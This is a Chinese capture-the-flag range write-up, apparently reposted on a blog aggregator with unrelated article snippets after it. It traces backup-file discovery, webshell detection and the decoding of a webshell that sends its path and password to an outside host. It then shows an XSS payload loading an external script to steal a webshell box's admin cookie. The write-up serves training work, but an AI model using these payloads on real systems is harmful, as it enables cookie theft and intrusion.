一次打靶场记录

news2025/4/11 0:38:01

题目提示

在这里插入图片描述

1、目录爆破

在对靶场进行信息收集、目录扫描之后发现结果存在www.zip,data.zp 两个备份文件
在这里插入图片描述
下载回来解压之后发现www.zip是网站备份文件,data.zip是数据库文件,存在一个maccms的数据库
苹果cms的数据库,导入本地数据库。
在这里插入图片描述
admin表

在这里插入图片描述

在mac_admin 管理员表中找到第一个flag: flag{ashndjkd123213}

对admin密码进行解,尝试后台登录失败,放弃

在这里插入图片描述

2、网站源码webshell

根据提示webshell查杀对网站备份www.zip进行查杀。
使用D盾进行扫描,发现可疑文件

在这里插入图片描述

看起来像个大马,关键部分截

在这里插入图片描述

在这里插入图片描述

访问对应网站目录php文件,404不存在

在这里插入图片描述例如:
对webshell进行代码审计,还原部分代码,从php代码中看出这个大马对关键词都进行了编码之类的操作

在这里插入图片描述
在这里插入图片描述

发现一串base64字符,解码之后得到

JHBhc3N3b3JkID0gIk1qRXlNRFkxTURFM01nYWRtaW5oYWNrZXIiOwoka2s9J2ZsYWd7YXNqZGFsa3NkajgzMmpkb2p9JzsKJHU9JF9TRVJWRVJbIkhUVFBfSE9TVCJdLiRfU0VSVkVSWyJQSFBfU0VMRSJdOwokcGhwX3NlbGY9c3Vic3RyKCRfU0VSVkVSWydQSFBfU0VMRiddLHN0cnJwb3MoJF9TRVJWRVJbJ1BIUF9TRUxGJ10sJy8nKSsxKTsKZWNobyAiPHNjcmlwdCBzcmM9J2h0dHA6Ly8xNzMuODIuMTM5LjM2OjMzMzMvYXBpLmFzcD91cmw9aHR0cDovLyR1LyRwaHBfc2VsZiZwYXNzPSRwYXNzd29yZCZpZD0xJz48L3NjcmlwdD4iOw==

在这里插入图片描述

第二个flag到手:flag{asjdalksdj832jdoj}

3、Xss 打cookie

对解码的关键部分分析:

$password = "MjEyMDY1MDE3Mgadminhacker";
$kk='flag{asjdalksdj832jdoj}';
$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];
$php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
echo "<script src='http://xxx.xxx.xxx.xx:3333/api.asp?url=http://$u/$php_self&pass=$password&id=1'></script>";

从这段base64解码结果得到新的url,访问

http://xxx.xxx.xxx.xx:3333/api.asp

在这里插入图片描述

登录入口,弱口令登录失败

在这里插入图片描述

大马中插入了这一段,分析发现这段代码是向http://xxx.xxx.xxx.xx:3333/api.asp 发送当前访问的url和password 密码,就是大马路径和访问密码,相关搜索后发现,http://xxx.xxx.xxx.xx:3333/api.asp 是一个“黑吃黑”webshell箱子,可以进行xss盗取cookie
反制


$password = "MjEyMDY1MDE3Mgadminhacker";
$kk='flag{asjdalksdj832jdoj}';
$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];
$php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);
echo "<script src='http://xxx.xxx.xxx.xx:3333/api.asp?url=http://$u/$php_self&pass=$password&id=1'></script>";

使用在线xss 接收cookie

在这里插入图片描述

构造请求url为http://xxx.xxx.xxx.xx:3333/api.asp?url=http://193.82.139.35/index.php&pass=<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/da';>&id=1

等待一会收到触发信息,返回了触发页http://xxx.xxx.xxx.xx:3333/admin/Php_list.asp的Cookie信息

在这里插入图片描述

访问替换cookie
在这里插入图片描述

成功进入后台管理页面

在这里插入图片描述

ASP信封页面发现第三个fla

flag{sadjhdjkdh23j1d}

在这里插入图片描述

php信封页面访问发送过来的马子
在这里插入图片描述

访问 http://xxx.xxx.xxx.xx:1080/vendor/topthink/think-helper/composer.php ,输入密码

在这里插入图片描述

c盘根目录存在flag.txt文件

在这里插入图片描述
在这里插入图片描述
通过type flag.txt得到

5qCF5qCPCmZnMmQtM2IzLWRqbHtkd2QtZjRqLTNhMS0yMnYtZXNkfQ==

进行base64解码得到提示是栅栏加密

在这里插入图片描述

进行栅栏解密

fg2d-3b3-djl{dwd-f4j-3a1-22v-esd} 栅栏解密得flag{12d-dw2-d23-vbf-34e-jsd-dj3}
第四个flag: flag{12d-dw2-d23-vbf-34e-jsd-dj3}
全部到手

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/435328.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【并发编程Python】为什么Python这么慢

Python速度慢的所有原因 Python作为一门非常优秀的计算机语言&#xff0c;其速度慢给Python减了很多分&#xff0c;也是其一直被诟病的主要原因之一&#xff0c;通常情况下&#xff0c;Python比Java/C慢约5-10倍&#xff0c;在一些特殊的情况下Python甚至比C慢100~200倍&#x…

数据结构——B树和B+树

数据结构——B树和B树 一、B树1.B树的特征2.B树的插入操作3.B树的删除操作4.B树的缺点 二、B树B树的特征 平衡二叉树或红黑树的查找效率最高&#xff0c;时间复杂度是O(nlogn)。但不适合用来做数据库的索引树。 因为磁盘和内存读写速度有明显的差距&#xff0c;磁盘中存储的数…

玩转肺癌目标检测数据集Lung-PET-CT-Dx ——③整理、验证数据,建立Dataset对象

文章目录 数据整理整理出所有的dcm文件整理出所有的xml标注文件整理数据①——舍弃错误的标注文件整理数据②——两个标注文件指向同一个目标图片的情况封装函数&#xff0c;传入xml文件&#xff0c;显示标注效果 整理数据③——将PETCT的三通道图像转成平扫CT的单通道图像格式…

企业费控,驶向「一体化」

在数字化于企业内部各个环节实现平权、成为标配的当下&#xff0c;财务&#xff0c;这个被称为“控制企业生命力”的核心环节&#xff0c;是否应该拥有新的价值&#xff1f; 作者| 皮爷 出品|产业家 2022年年中&#xff0c;施伟和分贝通的团队接到一项“特殊需求”。 这个…

在职读研专业——劳动经济学

研究方向&#xff1a;劳动经济学主要研究劳动力市场现象及其所引起的劳动力资源配置等相关问题&#xff0c;包括劳动力供给、劳动力需求、就业、工资、人力资本投资、收入分配等。例如&#xff1a;劳动力市场失衡背后各种因素的变化&#xff0c;如何通过资源的配置使劳动资源配…

MySQL innobackupex 备份工具使用总结

前言 在MySQL备份以及搭建从库的过程中&#xff0c;我们针对比较小的库大多采用的是mysqldump&#xff0c;简单&#xff0c;方便。但是在大库进行搭建从库的时候&#xff0c;且数据库主机没有一个很好的存储来满足备份&#xff0c;这个时候就需要使用innobackupex来协助你来做一…

Pocsuite3框架POC/EXP编写练习:Flask(Jinja2) 服务端模板注入漏洞

Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架。可以用来编写POC/EXP&#xff0c;今天借助Flask框架下的SSTI漏洞练习记录一下Pocsuite3框架的配置和编写过程。 官方文档&#xff1a;Pocsuite3 是什么&#xff1f; | Pocsuite3 安装 …

小黑继续跟着沛奇老师学携程:携程基础3

3.异步编程 3.1事件循环 理解成一个死循环&#xff0c;去检测并执行某些代码 # 伪代码任务列表 [任务1&#xff0c;任务2&#xff0c;任务3&#xff0c;...] while True:可执行的任务列表&#xff0c;已完成的任务列表 去任务列表中检查所有任务&#xff0c;将可执行和已完…

安装、启动和登陆doccano

一、安装 1、使用的Pycharm安装的doccano 2、初始化数据库 doccano init 3、创建用户名和密码 # admin是用户名&#xff0c;pass是密码&#xff0c;都可以自定义 doccano createuser --username admin --password pass 二、启动 1、在一个Terminal终端启动webserver服务 …

自适应控制专栏目录及介绍

目录 自适应控制专栏目录及介绍第一篇&#xff1a;[具有不确定参数系统的自适应跟踪控制设计_ADi_hhh的博客-CSDN博客](https://blog.csdn.net/qq_45830323/article/details/129713051)第二篇&#xff1a;[&#xff08;SISO&#xff09;单输入单输出系统的模型参考自适应控制_A…

cdh Hue集成sentry的权限管理详细步骤

hue登录hue的第一个用户要用hue用户创建,默认hue为超级用户,hue用户页面的权限可以管理很多用户操作,比如查看hdfs目录,使用其他组件,授权功能等等 一.hive的配置 1.关闭模拟,开启sentry 2.添加配置(注意配置的位置) <property> <name>sentry.hive.tes…

【C++11】lambda表达式

目录 lambda表达式 1.1 lambda表达式出现的原因 1.2 lambda表达式语法 1.3 函数对象与lambda表达式 lambda表达式 1.1 lambda表达式出现的原因 在C98中&#xff0c;如果想要对一个数据集合中的元素进行排序&#xff0c;可以使用 std::sort 方法 测试代码 #include <…

苹果撤离中国市场?中国市场太重要,印度制造是备胎

苹果在中国之行后&#xff0c;却计划进一步扩大印度制造iPhone的比例&#xff0c;甚至将iPhone15全数交给印度制造&#xff0c;业界因此认为苹果正在离开中国市场&#xff0c;然而这完全是臆想&#xff0c;中国市场对苹果来说仍然非常重要&#xff0c;它不会轻易舍弃这个市场。…

【Unity VR开发】结合VRTK4.0:添加碰撞忽略器

语录&#xff1a; 最远的旅行&#xff0c;是从自己的身体到自己的心&#xff0c;是从一个人的心到另一个人的心。坚强不是面对悲伤不流一滴泪&#xff0c;而是擦干眼泪后微笑面对以后的生活。 前言&#xff1a; 模块化提供了一种允许两个或者多个对象忽略彼此碰撞的方法&#x…

Logstash:多管道配置

我们大多数人已经熟悉 Elastic 产品。 在此博客中&#xff0c;我们将逐步介绍配置 Logstash 以使用多个管道摄取和处理数据的步骤。 Logstash 是一种开源数据处理管道&#xff0c;可让你摄取、转换和输出数据。 它是从各种来源收集和处理大量数据的强大工具&#xff0c;可用于管…

IP协议头

IP 4位版本号&#xff08;version&#xff09;4位头部长度&#xff08;header length&#xff09;8位服务类型&#xff08;Type Of Service&#xff09;16位总长度&#xff08;total length&#xff09;16位标识&#xff08;id&#xff09;3位标志字段13位分片偏移&#xff08;…

Spring的循环依赖

什么是循环依赖&#xff1f; 循环依赖其实就是循环引用&#xff0c;也就是两个或者两个以上的 bean 互相持有对方&#xff0c;最终形成闭环。比如 A 依赖于 B&#xff0c;B 依赖于 C&#xff0c;C 又依赖于 A。如下图&#xff1a; 注意&#xff0c;这里不是函数的循环调用&…

金陵科技学院五年一贯制专转本计算机应用基础考试大纲

金陵科技学院五年一贯制专转本计算机应用基础考试大纲 一、参考书目&#xff1a; 《大学计算机信息技术教程》&#xff0c;张福炎&#xff0c;孙志挥&#xff0c;南京大学出版社&#xff0c;《全国计算机等级考试一级教程计算机基础及MS Office应用》&#xff0c;教育部考试中…

书写我的人生回忆录-这应该是给子女和父母最好的礼物

作为一个业余的软件开发爱好者&#xff0c;我又捣鼓了一个有意思的小东西 &#xff0c;使用完全免费哈 您可以是以子女的身份帮助父母来完成这份回忆录&#xff1a; 《书写我的人生回忆录》是一款软件&#xff0c;其中包含70个问题&#xff0c;涵盖了父母的个人喜好、家庭、工…

关于图床使用

安装windows终端 Windows 终端安装 | Microsoft Learn 安装oh-my-posh 安装scoop &#xff08;后续都使用PowerShell 7.2.10&#xff09;&#xff1a; > Set-ExecutionPolicy RemoteSigned -Scope CurrentUser # Optional: Needed to run a remote script the first ti…